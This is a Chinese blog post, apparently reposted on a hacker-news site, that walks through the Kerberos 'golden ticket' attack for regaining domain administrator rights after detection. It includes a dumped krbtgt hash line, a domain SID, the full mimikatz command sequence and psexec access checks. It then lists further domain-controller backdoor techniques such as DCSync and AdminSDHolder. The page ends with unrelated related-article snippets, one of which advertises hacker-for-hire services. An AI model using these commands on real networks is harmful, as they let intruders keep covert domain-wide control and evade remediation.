渗透技术|域渗透的金之钥匙

hacker5年前黑客资讯435

  最近几年很少搞内网渗透了,这几年发展的快啊,看了A牛翻译的 ,发现趋势都是powershell脚本化了。想当年遇到的域控都是windows 2003的,找朋友要些vbscript脚本自动化,然后那啥那啥的。现在搞域除了前段时间出的MS14068,还有龙哥翻译的,不知道还有什么新 *** ,心中还有 *** ,如果想交流的朋友,可以加我聊聊。

  我原来发过一个微博说

  

  这就是我说的金之钥匙【"golden ticket(s)"黄金票据】,利用这个的条件是你在原来搞定域控的时候,已经导出过域用户的HASH,尤其是krbtgt 这个用户的。但是在你在内网干其他事情的时候,活儿不细,被人家发现了,你拥有的域管理员权限掉了,你现在还有一个普通的域用户权限,管理员做加固的时候又忘记修改krbtgt密码了(很常见),我们还是能重新回来,步骤如下:

  要重新拿回域管理员权限,首先要先知道域内的管理员有谁

  我这里的实验环境,通过截图可以看到域管理员是administrator

  我还要知道域SID是啥

  我的域SID是

  还有最重要的krbtgt用户的ntlm哈希,我原来导出的是

  krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::

  

  然后该用神器mimikatz出场了,依次执行

  mimikatz # kerberos::purge

  mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi

  mimikatz # kerberos::ptt Administrator.kiribi

  mimikatz # kerberos::tgt

  

  到现在,我们又重新拥有域管理员权限了,可以验证下

  E:\>net use \\WIN-0DKN2AS0T2G\c$

  E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd

  

  呃,感觉这个 *** 比http://drops.wooyun.org/tips/9297这个方便些,文章写了好久了,一直凑不出更多的字数,就没发。。嗯。。。懒了。。

  当然除了golden ticket,silver ticket之外还有kerberos ticket,历史SID,AdminSDHolder,DSRM,GPP,DCSync等技术手段都可以用来当做域控的隐藏后门。

  【原文:域渗透的金之钥匙 作者:mickey 安全脉搏整理发布】

标签: 渗透测试

相关文章

武昌区政府组织对重症病人逐一道歉怎么回事?武昌区政府为什么这么

武昌区政府组织对重症病人逐一道歉怎么回事?武昌区政府为什么这么

据环球时报报道,2月11日,武昌区政府领导来到武汉同济医院中法新城院区重症监护病房,向2月9日晚因武昌区所辖街道工作人员工作失职,而未能及时妥善安置的重症病人代表当面道歉。 同时进行的,是责令相关街...

富士康遭黑客攻击勒索(富士康遭黑客勒索比特币1804枚)

富士康遭黑客攻击勒索(富士康遭黑客勒索比特币1804枚)

本文导读目录: 1、富士康被黑客勒索1804个比特币,为啥黑客就要比特币? 2、富士康遭黑客勒索比特币1804枚,为什么黑客不要现金要比特币? 3、富士康遭黑客勒索,黑客勒索行为如何解决?...

中美黑客水平(中美黑客大战)

中美黑客水平(中美黑客大战)

intitle:黑客大战负责人 1、intitle:黑客大战负责人 2001年五一期间,由中美撞机事件引发的中美规模最大的网络黑客大战,短短数日就有数以千计的网站遭到攻击。2001年的中美黑客大战是怎...

印度泰米尔纳德tf内存卡无法格式化邦暴雨致10人死亡

  据印度媒体报道,印度南部泰米尔纳德邦连日遭受暴雨袭击,已造成至少10人死亡。   报道说,遇难者的死亡原因包括触电、溺水和房屋倒塌等。   报道说,已有包括4873名儿童在内的27391人被疏...

吉姆史密斯黑客(美吉姆国际早教)-手机黑客教学教程

吉姆史密斯黑客(美吉姆国际早教)-手机黑客教学教程

吉姆史密斯黑客(美吉姆国际早教)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑客业务、...

三问原创新药“九期一” 国家药监局为何“有条件批准”

全球17年来首个阿尔茨海默病新药获“有条件批准”引发争议—— 三问原创新药“九期一” 经济日报·中国经济网记者 沈 慧 2019年11月份,国家药品监督管理局有条件批准“九期一”作为治疗阿尔茨海...